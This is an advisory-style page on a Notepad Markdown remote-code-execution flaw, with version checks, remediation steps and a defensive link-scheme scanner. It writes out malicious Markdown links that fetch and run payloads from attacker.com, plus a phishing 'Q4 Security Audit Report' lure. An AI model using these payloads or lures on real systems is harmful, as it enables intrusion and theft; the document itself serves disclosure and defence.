
CVE-2026-20841: Windows Notepad RCE via Markdown
The new Markdown rendering in Windows Notepad has a critical flaw. A crafted .md file lets attackers execute code when you click a link.
TL;DR
- RCE in modern Windows Notepad (Microsoft Store version)
- Malicious Markdown links trigger command injection on click
- CVSS 8.8 — user interaction required but trivial to exploit
- Fix: update Notepad via Microsoft Store to version 11.2510+
What is CVE-2026-20841?
A remote code execution vulnerability in the modern Windows Notepad. The new Markdown rendering engine doesn't sanitize URI schemes in hyperlinks. Click a crafted link in a .md file and Notepad passes it straight to the system shell.
How It Works
Modern Notepad parses Markdown — bold, headers, and links. Attackers embed a link using a custom protocol scheme that points to a local script or command. Notepad doesn't validate the URI, passes it to the OS protocol handler, and the attacker's payload executes.
# Normal Markdown link:
[Click here](https://example.com)
# Malicious Markdown link — triggers command injection:
[Open Document](ms-msdt:/id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=h]$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Y2FsYy5leGU="))'))))i]")
# Or simpler — custom protocol to PowerShell:
[View Report](powershell://command=Invoke-WebRequest%20-Uri%20http://attacker.com/shell.exe%20-OutFile%20C:/temp/shell.exe;Start-Process%20C:/temp/shell.exe)
# What happens:
# 1. User opens malicious .md file in Notepad
# 2. Sees a normal-looking "View Report" link
# 3. Clicks it
# 4. Notepad sends URI to Windows protocol handler
# 5. PowerShell downloads and runs attacker's payload
Are You Vulnerable?
Check your Notepad version. If it's from the Microsoft Store and below 11.2510, you're exposed.
# Check Notepad version via PowerShell
Get-AppxPackage *Notepad* | Select-Object Name, Version
# If Version < 11.2510.0.0 → VULNERABLE
# If using legacy notepad (C:\Windows\System32\notepad.exe) → NOT affected
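# Check if .md files open in modern Notepad by default
# (assoc and ftype are cmd.exe built-ins; from PowerShell, run them through cmd /c)
cmd /c assoc .md
cmd /c "ftype | findstr /i notepad"
# Quick test: does your Notepad render Markdown?
# Create test.md with "# Hello"; if it shows as a heading, you are on the Markdown-rendering Store Notepad, so confirm its version with the check above
Legacy notepad.exe is NOT affected. Only the Microsoft Store version with Markdown support is.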
Exploit — Full Chain
Attacker sends a .md file via email. Victim opens it in Notepad, sees a professional-looking document, and clicks a link. Game over.
# 1. Create malicious Markdown file (attacker side)
cat > report.md << 'EOF'
# Q4 Security Audit Report
Status: **COMPLETE** | Classification: Internal
## Summary
All systems passed baseline security checks.
Click below to view the full interactive report.
[View Full Report](ms-msdt:/id PCWDiagnostic /skip force /param "IT_RBrowseForFile=$(IEX(IWR -Uri http://attacker.com/payload.ps1))")
---
*Generated by SecurityBot v4.2 | Do not forward*
EOF
# 2. Send via phishing email with subject:
# "Q4 Security Audit Results - Action Required"
# 3. Victim opens in Notepad, clicks "View Full Report"
# 4. PowerShell downloads and executes payload.ps1
# 5. Attacker has shell with victim's privileges
Remediation
Update immediately. Block if you can't update.
# Option 1: Update Notepad via Store (mandatory)
winget upgrade "Windows Notepad"
# Or: Microsoft Store → Library → Get Updates
# Option 2: Block modern Notepad via AppLocker (temporary)
# Create a deny rule for package: Microsoft.WindowsNotepad
# Option 3: Force .md files to open in legacy notepad
# (assoc and ftype are cmd.exe built-ins; run them from an elevated Command Prompt)
assoc .md=txtfile
ftype txtfile=C:\Windows\System32\notepad.exe %1
# Option 4: Group Policy — disable protocol handlers for Notepad
# Computer Config → Admin Templates → Windows Components
Update to version 11.2510+. If you can't, force .md files to open in legacy notepad.exe.
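A defensive triage check for the root cause described above (link URI schemes that are never validated), as an added example that is not code from the original page or from Microsoft: it scans Markdown text, for instance an attachment at a mail gateway, and reports every link whose scheme is outside an allowlist. The function name, the allowlist and the sample document are assumptions made for this example.

```python
import re

# Schemes a document viewer can reasonably hand to the OS. This allowlist is an
# assumption for the example; tighten or extend it for your environment.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

# RFC 3986 scheme, two or more characters so drive paths such as C:\ do not match.
_SCHEME = r"([A-Za-z][A-Za-z0-9+.\-]+):"
_PATTERNS = (
    # [text](scheme:...) with an optional <...> wrapper around the target
    ("inline", re.compile(r"\[([^\]]*)\]\(\s*<?" + _SCHEME)),
    # [id]: scheme:...  (reference-style link definition)
    ("reference", re.compile(r"^\s{0,3}\[([^\]]+)\]:\s*<?" + _SCHEME)),
    # <scheme:...>  (autolink; the empty group keeps group numbers aligned)
    ("autolink", re.compile(r"<()" + _SCHEME + r"[^>\s]*>")),
)


def find_risky_links(markdown_text, allowed=ALLOWED_SCHEMES):
    """Return (line_no, kind, label, scheme) for each link with a non-allowed scheme.

    Only the scheme is parsed, so targets containing spaces or nested
    parentheses are still caught. Links inside code blocks are reported too,
    which is the safe direction for triage.
    """
    findings, seen = [], set()
    for line_no, line in enumerate(markdown_text.splitlines(), start=1):
        for kind, pattern in _PATTERNS:
            for m in pattern.finditer(line):
                scheme = m.group(2).lower()      # schemes are case-insensitive
                key = (line_no, m.start(2))      # same URI matched by two patterns
                if scheme in allowed or key in seen:
                    continue
                seen.add(key)
                findings.append((line_no, kind, m.group(1), scheme))
    return findings


# Constructed sample document; payloads are replaced by placeholders.
SAMPLE = """\
# Q4 report
[Docs](https://example.com/docs) and [mail us](mailto:it@example.com)
[View Report](ms-msdt:/id PLACEHOLDER)
[Open](PowerShell://PLACEHOLDER) see <https://example.com> or <ms-msdt:PLACEHOLDER>
[ref]: file:///C:/PLACEHOLDER
[Local notes](notes/readme.md)
"""

if __name__ == "__main__":
    for line_no, kind, label, scheme in find_risky_links(SAMPLE):
        print(f"line {line_no}: {kind} link {label!r} uses scheme {scheme!r}")
```

An allowlist is used rather than a blocklist because any protocol handler registered on the endpoint is a possible target, not only the two schemes shown on this page.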